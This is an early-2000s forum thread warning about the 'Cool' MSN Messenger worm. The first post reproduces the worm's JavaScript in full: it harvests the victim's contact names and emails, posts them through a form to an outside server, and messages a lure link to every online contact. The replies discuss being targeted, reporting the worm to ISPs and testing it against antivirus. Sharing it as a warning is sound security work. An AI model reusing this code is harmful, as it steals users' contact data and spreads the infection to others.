Results 1 to 10 of 10

Thread: Msn Worm

  1. #1
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534

    Exclamation Msn Worm

    Hey all,


    MSN messenger, the wellknown im software from our friend Bill G. has another vulnerability...

    http://www.theregister.co.uk/content/4/24059.html

    A relatively benign but effective Internet worm attacked users of Microsoft's MSN Messenger service Wednesday by exploiting a bug in Internet Explorer that was reported last year, but was only recently patched by Microsoft.

    The Cool Worm spreads through the Microsoft Internet Explorer Same Origin Policy Violation vulnerability, reported by a security researcher called "ThePull" on December 19th, which went unacknowledged and unrepaired by Microsoft for months.
    The worm code look like this:

    <Script>

    var msnWin;
    var msnList;
    var msgStr = "URGENT - Ga hier 'ns heen http://denniz.com/valentijn.html";
    //var msgStr = "URGENT - Ga hier 'ns heen http://denniz.com/valentijn";

    function Go(){

    msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
    msnWin.resizeTo(1, 1);
    msnWin.moveTo(10000, 10000);
    msnWin.document.title = "Please Wait...";
    msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
    focus();

    if (msnWin.msnObj1.localState == 1){
    msnWin.msnObj2.autoLogon();
    }
    Contacts();
    Send();
    msnWin.close();
    document.contents.submit();
    }

    function Contacts(){
    msnList = msnWin.msnObj1.list(0);
    document.contents.email.value = msnWin.msnObj1.localLogonName;
    document.contents.subject.value = Date();
    var msnStr = "
    ";

    for (i=0;i<msnList.count;i++){
    if (msnList(i).state >1){
    msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "
    ";
    }

    else{
    msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "
    ";
    }
    }
    document.contents.contentBox.value = msnStr;
    }

    function Send(){
    for (i=0;i<msnList.count; i++){
    if (msnList(i).state >1){
    msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
    }
    }
    }

    </Script>

    <body onload="Go()">

    <form METHOD="POST" ACTION="http://www.rjdesigns.co.uk/cgi-bin/FormMail.pl" NAME="contents" ID="Form1">
    <input type="hidden" name="redirect" value="http://www.xxxxxxxxx.co.uk/cool/go.htm" ID="Hidden1">
    <input type="hidden" name="recipient" value="xxxxxxxxxxxxxxxxx@hotmail.com" ID="Hidden5">
    <input type="hidden" name="email">
    <input type="hidden" name="subject">
    <input type="hidden" NAME="contentBox" id="Hidden6">
    <input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
    </form>
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  2. #2
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  3. #3
    Ninja Code Monkey
    Join Date
    Nov 2001
    Location
    Washington State
    Posts
    1,027
    Yup. Someone tried to hit me with a variant of this....I've got the code on disk and sent a nice message to Microsoft and the guys isp. :P
    "When I get a little money I buy books; and if any is left I buy food and clothes." - Erasmus
    "There is no programming language, no matter how structured, that will prevent programmers from writing bad programs." - L. Flon
    "Mischief my ass, you are an unethical moron." - chsh
    Blog of X

  4. #4
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    Someone tried to hit me too..

    luckily I was msn-ing under linux, so no harm done...

    www.linux-messenger.tk (the JinXed edition ; )
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  5. #5
    Junior Member
    Join Date
    Feb 2002
    Posts
    4
    Good thread jinx...

    Some ***** sent me the virus too...
    thanks for the patch...
    hmmmmmmm forbidden donut!!

  6. #6
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    I'm realy sorry for you homer.

    I hope there was no real damage done..

    but in the future be carefull with url's ppl send u.
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  7. #7
    Senior Member
    Join Date
    Dec 2001
    Posts
    1,193
    Agreed - good post. Just for the hell of it I cut and pasted this baby and threw it at my av pkgs - they got it right away. Just testing heheh
    Trappedagainbyperfectlogic.

  8. #8
    Now, RFC Compliant! Noia's Avatar
    Join Date
    Jan 2002
    Posts
    1,210
    That worm was probably writen by DHF (Dutch HAck force) (A bunch of Ass-0, They took down my ISP for 2weeks once..... )
    The worm Deffinatly originated in Holland...... (It contains a Message In Dutch)

    Ne way's.... I hope some one will do something about the DHF, coz they ain't exactly White-Hatters.

    Nice Post though......I don't use MSN, but my friends (and enemies - HAHAHA) do...

    Tanx
    With all the subtlety of an artillery barrage / Follow blindly, for the true path is sketchy at best. .:Bring OS X to x86!:.
    Og ingen kan minnast dei linne drag i dronningas andlet den fagre dag Då landet her kvilte i heilag fred og alle hadde kjærleik å elske med.

  9. #9
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    My version (the one I posted) orriginates by an casema (cable internet) luser..

    I gave all the info in a nice mail to the ISP (casema.nl)

    There are allso english versions around.
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  10. #10
    Now, RFC Compliant! Noia's Avatar
    Join Date
    Jan 2002
    Posts
    1,210
    I use casema, It an absoluta Pile of ----
    Probably DHF then, They use them for security since Casema can't tell it's Elbow from it's
    Arse-0.....

    bwt: Jinx..... U in holland??
    With all the subtlety of an artillery barrage / Follow blindly, for the true path is sketchy at best. .:Bring OS X to x86!:.
    Og ingen kan minnast dei linne drag i dronningas andlet den fagre dag Då landet her kvilte i heilag fred og alle hadde kjærleik å elske med.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •